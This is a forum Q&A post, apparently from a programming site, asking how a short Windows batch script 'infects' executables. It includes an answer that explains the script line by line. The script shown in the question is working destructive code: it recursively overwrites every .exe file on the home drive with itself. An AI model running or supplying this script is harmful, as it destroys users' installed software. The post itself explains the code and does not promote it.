# Batch file infection command explanation

Tags: virus, batch-file

I do know that commands below is used to infect executable files. But I don't know how they work exactly. Can somebody explain this to me?

```
@echo off
Dir %Homedrive% /s /b > DirPath
  For /f %%Y In (DirPath) Do (
  Set DirPath=%%Y > Nul
 For %%Z In (%DirPath%\*.exe) Do (
Set ExeInfect=%%Z > Nul 
  Copy /y %0 %ExeInfect% 
 )
) 
Del /f /s /q DirPath
```

Comment: This is not infection, its more about destructing/replacing files with another. Effect would be pretty much same as if you just delete all your programs :)

Answer (score 5, accepted):

```
@echo off
```

Disables echoing the batch commands.

```
Dir %Homedrive% /s /b > DirPath
```

Lists all files and directories in you home drive (usually `C:`), one by line (`/b` switch), including subdirectories (`/s` switch) and stores the result in the file `DirPath`.

```
For /f %%Y In (DirPath) Do ( ... )
```

Transverses `DirPath` and executes `...` for each item. `%%Y` will contain the first item of the line.

```
Set DirPath=%%Y > Nul
```

Stores the first item of the line in the variable `DirPath`.

```
For %%Z In (%DirPath%\*.exe) Do ( ... )
```

Transverses all `.exe` files in the directory stored in the variable `DirPath`. `%%Z` will contain the name of the executable.

```
Set ExeInfect=%%Z > Nul
```

Stores the name of the executable in the variable `ExeInfect`.

```
Copy /y %0 %ExeInfect%
```

Copies without prompting (`/y` switch) the current executable (i.e., the batch file) over the executable stored in `ExeInfect`.

As a result all executables get replaced by the batch file.

Well, almost all. The first `For` command will behave improperly if the directory name contains spaces...